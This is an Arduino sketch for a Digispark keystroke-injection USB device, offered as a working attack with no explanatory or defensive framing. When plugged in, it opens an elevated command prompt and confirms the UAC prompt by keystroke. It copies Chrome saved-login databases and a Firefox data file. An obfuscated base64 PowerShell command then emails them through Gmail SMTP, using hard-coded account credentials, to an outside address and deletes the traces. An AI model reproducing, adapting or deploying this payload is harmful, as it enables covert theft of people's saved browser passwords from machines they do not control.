#include "DigiKeyboard.h"
void setup() {
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("cmd");
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print(F("MODE 16,1 & @echo off & xcopy "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 2\Login Data" "C:\Chrome.* " /Y /h /q >NUL & xcopy "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" "C:\Chrome.* " /Y /h /q >NUL & cd %LOCALAPPDATA%\Mozilla\Firefox\Profiles\*.default-*\OfflineCache\ & xcopy "index.sqlite" "C:\Firefox.*" /Y /h /q >NUL & cd %USERPROFILE% & powershell.exe -ExecutionPolicy Bypass -encodedCommand JABwAGEAcwBzAHcAZAAgAD0AIABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJwBzAGgAYQBoAHMAbQBpAHQAMQA4ACcAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlADsAIAAkAGMAcgBlAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBQAFMAQwByAGUAZABlAG4AdABpAGEAbAAgACgAJwBzAG0AaQB0AC4AcwBoAGEAaAAxADgAMQAyADIAJwAsACAAJABwAGEAcwBzAHcAZAApADsAIABTAGUAbgBkAC0ATQBhAGkAbABNAGUAcwBzAGEAZwBlACAALQBGAHIAbwBtACAAJwBzAG0AaQB0AC4AcwBoAGEAaAAxADgAMQAyADIAQABnAG0AYQBpAGwAJwAgAC0AVABvACAAJwBzAG0AaQB0AC4AcwBoAGEAaAAxADgAMQAyADIAQABnAG0AYQBpAGwALgBjAG8AbQAnACAALQBDAGMAIAAnAHMAbQBpAHQALgBzAGgAYQBoADEAOAAxADIAMgBAAGcAbQBhAGkAbAAuAGMAbwBtACcAIAAgAC0AUwB1AGIAagBlAGMAdAAgACcAQgByAG8AdwBzAGUAcgAgAFAAYQBzAHMAdwBvAHIAZAAnACAALQBCAG8AZAB5ACAAJwBMAG8AZwBpAG4AIABEAGEAdABhACAARgBvAHIAIABCAHIAbwB3AHMAZQByAHMAOgAnACAALQBDAHIAZQBkAGUAbgB0AGkAYQBsACAAJABjAHIAZQBkACAALQBVAHMAZQBTAHMAbAAgAC0AUwBtAHQAcABTAGUAcgB2AGUAcgAgACcAcwBtAHQAcAAuAGcAbQBhAGkAbAAuAGMAbwBtACcAIAAtAFAAbwByAHQAIAA1ADgANwAgAC0AQQB0AHQAYQBjAGgAbQBlAG4AdABzACAAJwBDADoALwBDAGgAcgBvAG0AZQAnACwAIAAnAEMAOgAvAEYAaQByAGUAZgBvAHgALgBzAHEAbABpAHQAZQAnACAAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAnAEMAOgBcAEMAaAByAG8AbQBlACcALAAgACcAQwA6AFwARgBpAHIAZQBmAG8AeAAuACoAJwA="));
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);
}

void loop() {
}
